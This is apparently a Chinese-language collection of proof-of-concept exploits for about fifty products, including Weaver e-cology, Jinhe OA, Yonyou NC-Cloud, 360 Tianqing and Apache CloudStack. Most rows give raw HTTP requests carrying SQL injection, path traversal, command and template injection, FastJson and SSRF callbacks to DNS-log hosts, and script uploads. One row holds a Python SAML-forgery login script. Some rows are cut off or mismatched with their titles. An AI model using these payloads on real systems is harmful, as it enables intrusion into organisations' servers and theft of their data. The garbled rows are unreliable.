| 同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞 | POST /Service/DownloadTemplate.asmx HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Cookie: ASP.NET_SessionId=f40br0ilcoosnxgllqrmltkd Upgrade-Insecure-Requests: 1 Priority: u=1 SOAPAction: http://tempuri.org/DownloadFile Content-Type: text/xml;charset=UTF-8 Host: Content-Length: 310 <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:tem=”http://tempuri.org/”> |
| 全息AI网络运维平台存在命令执行漏洞 | POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 34 ping_cmd=8.8.8.8|echo test > 1.txt |
| 泛微e-cology 9 WorkflowServiceXml SQL注入漏洞 | POST /services/WorkflowServiceXml HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Content-Length: 422Connection: closeContent-Type: text/xmlAccept-Encoding: gzip11111=1 AND 2=2 |
| Sharp 多功能打印机未授权访问漏洞 | /installed_emanual_list.html |
| 联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞 | /UniExServices/link/queryLinklnfo?address=%27%3BSELECT%20PG_SLEEP%285%29– |
| Coremail 邮件系统溢出 | 攻击者123.56.109.160 |
| 泛微云桥注入getshell | 未知 |
| LiveNVR流媒体服务软件存在未授权访问漏洞 | /api/v1/device/channeltree?serial=&pcode |
| 科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞 | POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Type: application/x-www-form-urlencoded Connection: close start=0&limit=20&filer=1;SELECT SLEEP(5)# |
| 用友NC-Cloud blobRefClassSearch接口存在FastJson反序列化漏洞 | POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1 Content-Type: application/json Host: Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 {“clientParam”:”{\”x\”:{\”@type\”:\”java.net.InetSocketAddress\”{\”address\”:,\”val\”:\”DNSLOG.COM\”}}}”} |
| 华磊科技物流modifyInsurance存在sql注入漏洞 | GET /modifyInsurance.htm?documentCode=1&insuranceValue=1&customerId=1+AND+6269=(SELECT+6269+FROM+PG_SLEEP(5)) HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close |
| 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞 | /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config |
| Bazarr swaggerui任意文件读取漏洞 | GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close |
| 泛微E-Mobile移动管理平台installOperate.do存在SSRF漏洞 | |
| 泛微e-cology9 存在SSRF漏洞 | POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/json Upgrade-Insecure-Requests: 1 { |
| 青果教务系统存在未授权访问漏洞 | 未知 |
| 飞讯云WMS /MyDown/MylmportData 前台SQL注入 | /MyDown/MyImportData?opeid=’ WAITFOR DELAY ‘0:0:5’– AtpN |
| Apache RocketMQ 敏感数据泄露漏洞 | 未知 |
| 红海云eHR kgFile.mob 任意文件上传 | POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1 Host: Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryt7WbDl1tXogoZys4 ——WebKitFormBoundaryt7WbDl1tXogoZys4 <% out.print(“hello,eHR”);%> |
| PEPM Cookie 远程代码执行漏洞 | 未知 |
| 猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞 | POST /inter/software_relation.php HTTP/1.1 Host: 192.168.249.137:6868 Content-Length: 1557 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Origin: http://192.168.249.137:6868 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryxRP5VjBKdqBrCixM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ——WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name=”toolImage”; filename=”3.php” Content-Type: image/png |
| 湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞 | POST /comfileup.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe Upgrade-Insecure-Requests: 1 Priority: u=1 Content-Type: multipart/form-data; boundary=——–1110146050 Content-Length: 117 ———-1110146050 test |
| Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107) | import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedeltaimport xml.etree.ElementTree as ETimport base64import logging# Setup logginglogging.basicConfig(filename=’exploit.log’, level=logging.INFO, format=’%(asctime)s – %(message)s’)# URL of the login endpointurl = “http://target-cloudstack-instance.com/client/api”# Function to generate dynamic SAML responsedef generate_saml_response(username):issue_instant = datetime.utcnow().strftime(‘%Y-%m-%dT%H:%M:%SZ’)not_on_or_after = (datetime.utcnow() + timedelta(hours=1)).strftime(‘%Y-%m-%dT%H:%M:%SZ’)saml_response = f”””http://your-saml-issuer.comhttp://your-saml-issuer.com{username}{url}urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport”””return base64.b64encode(saml_response.encode(‘utf-8’)).decode(‘utf-8’)# List of usernames to attempt accessusernames = [“user1@example.com”, “user2@example.com”, “admin@example.com”]# Function to attempt login with SAML responsedef attempt_login(saml_response):data = {“command”: “samlSsoLogin”,”SAMLResponse”: saml_response}response = requests.post(url, data=data)if response.status_code == 200:soup = BeautifulSoup(response.text, ‘html.parser’)session_id = soup.find(‘sessionid’)if session_id:logging.info(f”Login successful, session ID: {session_id.text}”)print(f”Login successful, session ID: {session_id.text}”)else:logging.info(“Login failed, no session ID found in response.”)print(“Login failed, no session ID found in response.”)else:logging.info(f”Login failed, status code: {response.status_code}”)print(f”Login failed, status code: {response.status_code}”)# Attempt login for each usernamefor username in usernames:saml_response = generate_saml_response(username)attempt_login(saml_response) |
| WVP视频平台(国标28181)未授权SQL注入漏洞 | GET /api/push/list?page=1&count=15&query=1’&pushing=&mediaServerId= HTTP/1.1 Host: Accept-Encoding: gzip, deflate, br Accept: */* Connection: close |
| 华磊科技物流getOrderTrackingNumber存在sql注入漏洞 | GET /getOrderTrackingNumber.htm?documentCode=1’and%0a1=user::integer– HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close |
| 创客13星零售商城系统前台任意文件上传漏洞 | POST /Login/shangchuan HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 197 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryBP56KuZOdlY4nLGg Host: 127.0.0.1 Origin: http://127.0.0.1 Referer: http://127.0.0.1/Login/shangchuan Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 sec-ch-ua: “Not/A)Brand”;v=”8″, “Chromium”;v=”126″, “Google Chrome”;v=”126″ sec-ch-ua-mobile: ?0 sec-ch-ua-platform: “Windows” sec-fetch-user: ?1 ——WebKitFormBoundary03rNBzFMIytvpWhy <?php phpinfo();?> |
| 建文工程管理系统BusinessManger.ashx存在SQL注入漏洞 | POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 method=PrjType&content=%’ and 1=2 union select 1,(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(‘MD5′,’233’)),3,32));– a |
| 建文工程管理系统desktop.ashx存在SQL注入漏洞 | POST /SysFrame4/Desktop.ashx HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 account=1’+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(‘MD5′,’233’)),3,32))<0–&method=isChangePwd&pwd= |
| 明源云ERP接口ApiUpdate.ashx文件上传漏洞 | POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1 Host: target.com Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 856 {{unquote(“PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00”)}} |
| 泛微e-cology9接口WorkPlanService前台SQL注入漏洞 | POST /services/WorkPlanService HTTP/1.1Content-Length: 430Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9SOAPAction:Content-Type: text/xml;charset=UTF-8Host: 192.168.52.168Referer: http://192.168.52.168:80/services/WorkPlanServiceCookie: ecology_JSessionid=aaawzto5mqug94J9Fz0czConnection: close<soapenv:Envelopexmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:web=”webservices.workplan.weaver.com.cn”>(SELECT 8544 FROM(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)22 |
| 友时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞 | /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27– |
| 金和OA C6 GeneralXmlhttpPage.aspx SQL注入漏洞 | 未知 |
| 金和OA jc6 clobfield SQL注入漏洞 | POST /jc6/servlet/clobfield HTTP/1.1 host:127.0.0.1 key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11%27%2F**%2Fand%2F**%2FCONVERT%28int%2C%40%40version%29%3D1%2F**%2Fand%2F**%2F%27%27%3D%27 |
| 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞 | GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:6%27–&TVersion=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Connection: close Cookie: ASP.NET_SessionId=0uha1u0nhrn4meghddjiwu0y Accept-Encoding: gzip |
| 金和OA_CarCardInfo.aspx_SQL注入漏洞 | POST /c6/JHSoft.Web.Vehicle/CarCardInfo.aspx/ HTTP/1.1 Host: your_ip Content-Length: 2096 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: ASP.NET_SessionId=dvljrtibwe4dne1nyvda0iw1; myie=false Connection: close _ListPage1LockNumber=1&_ListPage1RecordCount=0&__VIEWSTATE=%2FwEPDwUKMjAyNTc4NzA3NA8WAh4Ic3RyUXVlcnkFCWRlbGZsYWc9MBYCZg9kFgQCAg8PFgIeBFRleHQFBuafpeivomRkAgMPDxYMHglfUGFnZVNpemUCKB4PX1NvcnRBdHRyaWJ1dGVzMtgDAAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAMAgAAAFFVc2VyV2ViQ29udHJvbC5EYXRhR3JpZCwgVmVyc2lvbj04LjUuNS4xMDAxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW51bGwFAQAAADlVc2VyV2ViQ29udHJvbC5EYXRhR3JpZC5EYXRhR3JpZCtTb3J0QXR0cmlidXRlc0NvbGxlY3Rpb24BAAAAEEF0dHJpYkNvbGxlY3Rpb24EOFVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK1NvcnRBdHRyaWJ1dGVDb2xsZWN0aW9uAgAAAAIAAAAJAwAAAAUDAAAAOFVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK1NvcnRBdHRyaWJ1dGVDb2xsZWN0aW9uAQAAABNDb2xsZWN0aW9uQmFzZStsaXN0AxxTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0AgAAAAkEAAAABAQAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdAMAAAAGX2l0ZW1zBV9zaXplCF92ZXJzaW9uBQAACAgJBQAAAAAAAAAAAAAAEAUAAAAAAAAACx4MX1JlY29yZENvdW50Zh4HX2J1dHRvbjLsBAABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABRVXNlcldlYkNvbnRyb2wuRGF0YUdyaWQsIFZlcnNpb249OC41LjUuMTAwMSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsBQEAAAAyVXNlcldlYkNvbnRyb2wuRGF0YUdyaWQuRGF0YUdyaWQrQnV0dG9uc0NvbGxlY3Rpb24BAAAAB2J1dHRvbnMEL1VzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW1Db2xsZWN0aW9uAgAAAAIAAAAJAwAAAAUDAAAAL1VzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW1Db2xsZWN0aW9uAQAAABNDb2xsZWN0aW9uQmFzZStsaXN0AxxTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0AgAAAAkEAAAABAQAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdAMAAAAGX2l0ZW1zBV9zaXplCF92ZXJzaW9uBQAACAgJBQAAAAEAAAABAAAAEAUAAAAEAAAACQYAAAANAwUGAAAAJVVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW0EAAAABF9JbWcGX1RpdGxlCF9EaXNwbGF5EV9Eb3NjcmlwdGlvblRpdGxlAQEAAQECAAAABgcAAAA3Li4vSkhzb2Z0LlVJLkxpYi9pbWFnZXMvaWNvbi50b29sYmFyLzE2cHgvZGV0ZXJtaW5lLnBuZwYIAAAABuehruWumgEGCQAAAAALHglfSWRlbnRpZnkCAR4LX2RhdGFTb3VyY2UFaTxyb290PjxyZWNvcmQ%2BPElEPjwvSUQ%2BPGl0ZW0gQ29sdW1uTmFtZT0n6L2m5Z6LJz48L2l0ZW0%2BPGl0ZW0gQ29sdW1uTmFtZT0n54mM54WnJz48L2l0ZW0%2BPC9yZWNvcmQ%2BPC9yb290PmRkZJju89%2Fcb0ViP%2BHqYZwpEbj%2BGmY0EecUW2zJyvdwmUng&txt_CarType=1′);WAITFOR DELAY ‘0:0:5’–&txt_CarCode=1&bt_Search=%B2%E9%D1%AF&__VIEWSTATEGENERATOR=0A1FC31B&__EVENTTARGET=&__EVENTARGUMENT= |
| 金和OA_HomeService.asmxSQL注入 | GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1’%3b+WAITFOR%20DELAY%20%270:0:5%27– HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close |
| 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞 | POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1 Host: your-ip Accept-Encoding: gzip Content-Type: application/x-www-form-urlencoded moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1 |
| 金和OA_MailTemplates.aspx_SQL注入漏洞 | GET /C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1%3BWAITFOR+DELAY+%270%3A0%3A3%27– HTTP/1.1 Host: you_ip Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close |
| 金和OA_jc6_Upload任意文件上传 | POST /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Length: 197 Content-Type: multipart/form-data; boundary=ee055230808ca4602e92d0b7c4ecc63d –ee055230808ca4602e92d0b7c4ecc63d <% out.println(“tteesstt1”); %> |
| 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞 | GET /c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 金和OAC6-FileDownLoad.aspx任意文件读取漏洞 | GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cache-Control: max-age=0 Connection: close Upgrade-Insecure-Requests: 1 |
| 金和OA_SAP_B1Config.aspx未授权访问漏洞 | /C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1 |
| 金和OA_jc6_ntko-upload任意文件上传漏洞 | POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1 Host: you_ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Content-Length: 392 Accept: */* Accept-Encoding: gzip, deflate Connection: close Content-Type: multipart/form-data; boundary=—-zqulxi4ku42pfmoelvc0 Connection: close ——zqulxi4ku42pfmoelvc0 ../../../../upload/xicxc2sv1n.jsp <% out.println(111*111); %> upload |
| 金和OA_upload_json.asp存在任意文件上传漏洞 | POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1 Host: your_ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Content-Length: 338 Accept: */* Accept-Encoding: gzip, deflate Connection: close Content-Type: multipart/form-data; boundary=—————————153857212076213662067051609723 —————————–153857212076213662067051609723 —————————–153857212076213662067051609723 hhh |
| 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞 | POST /C6/Control/UploadFileEditorSave.aspx?filename=\….\….\C6\qps4cckjuz.asp HTTP/1.1 Host: your_ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Connection: close Content-Length: 191 Content-Type: multipart/form-data; boundary=—-9fh1lo9qobtszaiahg6v Accept-Encoding: gzip, deflate ——9fh1lo9qobtszaiahg6v <% response.write(111*111) ——9fh1lo9qobtszaiahg6v– |
| 金和OA任意文件读取漏洞 | GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Connection: Keep-Alive |
| 据说有全版本0day | 未知 |
| 29网课交单平台epay.php存在SQL注入漏洞 | POST /epay/epay.php HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Content-Type: application/x-www-form-urlencoded Connection: close out_trade_no=’ AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND ‘aEmC’=’aEmC |
| 360 新天擎终端安全管理系统存在信息泄露漏洞 | /runtime/admin_log_confcache |
| 360天擎 – 未授权访问 | /api/dp/rptsvcsyncpoint?ccid=1 |
| 360天擎 – sql注入 | /api/dp/rptsvcsyncpoint?ccid=1′;SELECT PG_SLEEP(5)– |
| Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767 | import requests import re import urllib3 import argparse urllib3.disable_warnings() parser = argparse.ArgumentParser() def get_uuid(): def exploit(uuid): if __name__ == “__main__”: |
| AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597) | GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20–%20a HTTP/1.1 Host: localhost sec-ch-ua: “Not-A.Brand”;v=”99″, “Chromium”;v=”124″ sec-ch-ua-mobile: ?0 sec-ch-ua-platform: “Linux” Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n Connection: close |
| aiohttp存在目录遍历漏洞(CVE-2024-23334) | GET /static/../../../../../../etc/passwd HTTP/1.1 Host: xxxxx Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
